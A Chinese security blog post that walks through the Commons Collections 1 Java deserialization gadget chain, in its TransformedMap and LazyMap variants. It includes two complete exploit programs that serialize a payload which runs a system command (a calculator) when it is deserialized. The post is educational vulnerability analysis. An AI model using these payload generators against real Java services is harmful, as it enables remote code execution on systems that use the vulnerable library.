commons-collections1(cc1)反序列化链分析

已于 2024-03-15 20:26:30 修改
阅读量5.1k 收藏 6
点赞数 1
分类专栏: java安全 cc链 文章标签: cc链
于 2022-01-30 16:34:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/122748213
版权

commons-collections1

commons-collections1也就是常说的cc1,网上一般有两条链子,一个就是ysoserial中的lazymap链,还有transformedmap链,刚开始碰到cc1链子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!

环境配置

java < 8u71(再往后它的AnnotationInvocationHandler中readObject函数有改动)

CommonsCollections <= 3.2.1

在这里插入图片描述

在这里插入图片描述

原理分析

前半部分都是由Transformer接口组成的一条链,Transformer是一个接口类,提供了一个对象转换方法transform:

public interface Transformer {

    public Object transform(Object input);

}

该接口的重要实现类有:ConstantTransformer、invokerTransformer、ChainedTransformer、TransformedMap

  1. ConstantTransformer --> 把⼀个对象转换为常量,并返回 ->获取到了Runtime.class
  2. InvokerTransformer --> 通过反射,返回⼀个对象 -> 反射获取执行方法加入参数
  3. ChainedTransforme -->执⾏链式的Transformer⽅法 ->将反射包含的数组进行链式调用,从而连贯起来

前半部分都相同,后面是两种思路

  1. TransformedMap 配合sun.reflect.annotation.AnnotationInvocationHandler 中的 readObject()
  2. lazyMap配合sun.reflect.annotation.AnnotationInvocationHandler 中的Invoke()+动态代理

InvokerTransformer

在这里插入图片描述

可以看到该方法中采用了反射的方法进行函数调用,Input 参数为要进行反射的对象 iMethodName , iParamTypes 为调用的方法名称以及该方法的参数类型,iArgs 为对应方法的参数,这三个参数均为可控参数:

ConstantTransformer

在这里插入图片描述
方法很简单,就是返回 iConstant 属性,该属性也为可控参数:

ChainedTransformer

在这里插入图片描述

可以看出需要传入一个 Transformer 数组,而这里使用了 for 循环来调用 Transformer 数组的 transform() 方法,并且使用了 object 作为后一个调用transform() 方法的参数,举个例子

new ConstantTransformer(Runtime.getRuntime())
new InvokerTransformer("exec", new Class[]{String.class},new Object[{"calc"})

这样传参我们就可以执行系统命令了

其实这三步走完,到这里只要构造包含命令的 ChainedTransformer 对象,然后触发 ChainedTransformer 对象的 transform() 方法,即可实现目的,那么问题来了,如何传入的ChainedTransformer并且触发transform方法呢,接下来就是两种思路

TransformedMap链

我们发现在TransformedMap的checkSetValue() 方法中会触发 transform() 方法,

在这里插入图片描述我们可以首先构造一个 Map 和一个能够执行代码的 ChainedTransformer ,生成一个 TransformedMap ,当map的key或value发生改变时(调用TransformedMapsetValue/put/putAll中的任意方法),就会自动触发chainedtransformer

那就先找调用checkSetValue方法的地方,这里发现它的父类AbstractInputCheckedMapDecorator

AbstractInputCheckedMapDecorator

在这里插入图片描述

这里的this.parent传入的就是TransformedMap,AbstractInputCheckedMapDecorator 的根父类实际就是 Map ,所以我们现在只需要找到一处 readObject 方法,只要它调用了 Map.setValue() 方法,即可完成整个反序列化链。

AnnotationInvocationHandler

这里就引用到了AnnotationInvocationHandler,这个类中有一个成员变量 memberValues 是 Map 类型,它的readObject()函数中对memberValues调用了setValue()函数。

在这里插入图片描述

在这里插入图片描述

这里的攻击链也就是
TransformedMap->AnnotationInvocationHandler.readObject()->setValue()->checkSetValue()

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
public class cc1 {
    public static Object Reverse_Payload() throws Exception {
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "open /Applications/Calculator.app" }) };
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innermap = new HashMap();
        innermap.put("value", "value");
        Map outmap = TransformedMap.decorate(innermap, null, transformerChain);
        //通过反射获得AnnotationInvocationHandler类对象
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        //通过反射获得cls的构造函数
        Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
        //这里需要设置Accessible为true,否则序列化失败
        ctor.setAccessible(true);
        //通过newInstance()方法实例化对象
        Object instance = ctor.newInstance(Retention.class, outmap);
        return instance;
    }

    public static void main(String[] args) throws Exception {
        GeneratePayload(Reverse_Payload(),"obj");
        payloadTest("obj");
    }
    public static void GeneratePayload(Object instance, String file)
            throws Exception {
        //将构造好的payload序列化后写入文件中
        File f = new File(file);
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(instance);
        out.flush();
        out.close();
    }
    public static void payloadTest(String file) throws Exception {
        //读取写入的payload,并进行反序列化
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
        in.readObject();
        in.close();
    }
}

lazymap链

在lazymap中有一个get方法通过put调用了factory成员的transform方法
在这里插入图片描述

接下来同样只需要找到一个readObject方法去调用了该get方法即可,这里AnnotationInvocationHandler的一个invoke中有执行get方法
在这里插入图片描述

InvocationHandler handler = new ExampleInvocationHandler(new HashMap());
 //创建一个InvocationHandler接口的对象
Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler); 
//第一个参数为类加载器,第二个参数类型,第三个参数传入我们的接口当我们引用proxyMap中的方法时,会先在handler中的invoke方法中进行修饰,执行invoke里的代码

我们的memberValues成员为lazymap对象(memberValues的赋值在构造函数中,且我们可控),当我们执行到下面这里的时候,就会触发代理机制,然后进入Invoke方法,从而触发命令执行
在这里插入图片描述

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

public class CommonCollections12 {
    public static Object generatePayload() throws Exception {
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc" })
        };
        Transformer transformerChain = new ChainedTransformer(transformers);

        Map innermap = new HashMap();
        innermap.put("value", "xxx");
        Map outmap = LazyMap.decorate(innermap,transformerChain);
        //通过反射获得AnnotationInvocationHandler类对象
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        //通过反射获得cls的构造函数
        Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
        //这里需要设置Accessible为true,否则序列化失败
        ctor.setAccessible(true);
        //通过newInstance()方法实例化对象
        InvocationHandler handler = (InvocationHandler)ctor.newInstance(Retention.class, outmap);
        Map mapProxy = (Map)Proxy.newProxyInstance(LazyMap.class.getClassLoader(),LazyMap.class.getInterfaces(),handler);
        Object instance = ctor.newInstance(Retention.class, mapProxy);

        return instance;
    }
    public static void main(String[] args) throws Exception {
        payload2File(generatePayload(),"obj");
        payloadTest("obj");
    }
    public static void payload2File(Object instance, String file)
            throws Exception {
        //将构造好的payload序列化后写入文件中
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(file));
        out.writeObject(instance);
        out.flush();
        out.close();
    }
    public static void payloadTest(String file) throws Exception {
        //读取写入的payload,并进行反序列化
        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
        in.readObject();
        in.close();
    }
}

参考CC链学习-上
参考深入理解 JAVA 反序列化漏洞
参考Java安全(七) CC链1
Java反序列化CommonsCollections篇(一) CC1链手写EXP

Matat4
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java序列CC1
一剑开天门!的博客
03-02 463
Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类。作为Apache开源项⽬的重要组件,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,⽽正 是因为在⼤量web应⽤程序中这些类的实现以及⽅法的调⽤,导致了序列⽤漏洞的普遍性和严重性
CC1链分析
sunyufei_666的博客
06-15 252
第一个是memberType类型不为空值,这里type是传入的Override.class,annotationType.memberTypes()为调用出入class的成员方法,所以,传入的class类中必须存在成员方法,且成员变量的key值必须与map中的key值相同,而Override.class的成员方法为空值,所以这里可以选择Target.class作为参数。这里有两个if,如果这两个if的条件为false时,无法调用里面的setValue方法。
java代码审计之CC1链(一)
st3pby的博客
02-20 3778
InvokerTransformerCC1链的漏洞点位于InvokerTransformer.class中射加载参数可控那么只需要调用到这个点,就可以触发漏洞,可以参考ysoserial中的CC1利用ysoserial中的CC1链,是使用LazyMap构造的,LazyMap构造的整条攻击路径为。
java序列CC1
Go_change的博客
05-09 232
序列是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,就是将对象转换成另一种形式,以方便跨平台存储和网络传输。序列则是将上述过程过来进行的操作。在Java中任何一个对象必须要实现Serializable接口才可以执行序列序列操作。
Java代码审计:序列链CommonsCollections1详解
god_Zeo的安全博客
08-27 1481
0x01 漏洞介绍 Apache Commons Collections是一个第三方的基础类库,提供了很多强有力的数据结构类型并且实现了各种集合工具类,可以说是apache开源项目的重要组件。 CommonsCollection在java序列的源流中已经存在5年 今天介绍的CommonsCollections1,序列的第一种RCE序列链 CommonsCollections1序列漏洞点仍然是commons-collections-3.1版本 0x02 实验环境 maven的pom导入依赖
commons-collections4-4.1
11-01
Apache Commons Collections 3.2.0及更早版本中存在这样一个漏洞,因为该库包含了一些不安全的序列方法,使得攻击者可以通过精心构造的输入来触发代码执行。 在Apache Commons Collections 4.1中,这个问题得到...
commons-collections-3.2.2-
11-01
序列是将已序列的对象状态还原为可执行对象的过程,如果这个过程没有得到适当的验证,攻击者可以构造恶意的序列数据,导致安全问题。 为了修补这个漏洞,我们需要将WebLogic服务器中旧版本的Apache Commons...
commons-collections-3.2.2-bin.zip
02-03
7. **集合的序列序列**:提供了一种方便的方式来序列序列集合,这对于数据存储和网络传输非常有用。 8. **泛型支持**:Collections库在3.2.2版本中已经支持Java泛型,这使得代码更具类型安全性和...
commons-collections-3.2.jar
09-29
10. **工具类**:包含一些通用的实用工具,如集合的深度拷贝、序列序列、对象的克隆等。 在实际开发中,"commons-collections-3.2.jar"可以被广泛应用于数据处理、数据结构优和算法实现等领域。只需将此...
commons-collections4-4.4-bin.zip
06-07
支持集合的序列序列,这在数据持久和网络传输中非常有用。 9. **算法**: 包含一些通用的算法,如`Frequencies`统计集合中元素出现的频率,`ForEach`遍历并执行操作,`Partition`将集合分割成满足特定...
Java安全入门(二)——CC链1 分析+详解
热门推荐
weixin_45808483的博客
01-29 1万+
背景 在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java序列和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。 从Apache CommonsCollections 说起。 Apache C...
JAVA序列CC1分析
Re_ly0n的博客
03-26 5534
序列的原理 首先是要继承Serialize类只有继承了这个类菜能够进行序列,如果某一个类没有继承serialize类并在一条利用链中所需要的地方,我们就可以通过射来进行处理。例如在java中Runtime.getRuntime()是没有继承seralize类的 但是Runtime.class是继承了的 这样以来就可以通过射来进行序列序列,射核心代码如下 上面的代码都是可以成功弹出计算器的。利用链的构造尝试使用同名不同类的方法来进行调用。在这里就是复习...
JavaSec 基础之 CC1 链
最新发布
akdelt的博客
03-11 430
调用了 checkSetValue。而且它是 TransformedMap 的父类。
Java序列之CommonsCollections CC1链分析
shelter1234567的博客
09-07 546
cc链的研究可以说是非常适合java代码审计的入门篇了,十分考验java代码功力,其实也是基础功,跨过了这个门槛,在看看其他业务代码就会比较轻松了。不要说代码难,看不懂,作者也是刚入门java没几个月的小白,只要基本功扎实,慢慢看 慢慢调式。你也会慢慢明白其中的运行逻辑。commons-collections 是 Apache Commons 项目中的一个子项目,它提供了一组有用的集合类,这些类扩展了 Java 标准库中的集合类,并提供了许多额外的功能。
ThinkPHP3.2.3序列链子分析
蚁景网安学院
04-14 166
点击蓝色关注我们前言目前官方已经不再维护ThinkPHP3.2.3,本文仅对ThinkPHP3.2.3序列链子进行复现,如有纰漏,还望指正。环境介绍MAMP proPhpStormXdebug利用条件具备序列入口分析过程首先在分析前,先新建一个控制器,写一个序列入口在Application/Home/Controller/HelloController.cla...
Commons-Collections1链分析
weixin_45682070的博客
01-04 742
条件限制: ​JDK版本:jdk1.8以前(8u71之后已修复不可利用) CC版本:Commons-Collections 3.1-3.2.1 环境搭建: <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId&g
CommonsCollections 1分析
qq_31065143的博客
04-01 517
CommonsCollections 1分析 利用链 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke() LazyMap.get() Chai
CC1(LazyMap版)
..
10-14 625
前面我们介绍了TransformedMap版的CC1链, 但是在ysoserial中用的是LazyMap,其实都差不多,下面开始分析一下,下面重在分析,如何找的就不说了(也不会)。如果文章有错误,欢迎斧正。
weblogic序列原理
06-09
WebLogic序列漏洞的原理是在WebLogic ...由于Apache Commons Collections库中的一些可序列类存在漏洞,攻击者可以通过构造特定的序列数据,使WebLogic Server在序列时触发漏洞,从而执行攻击者的恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值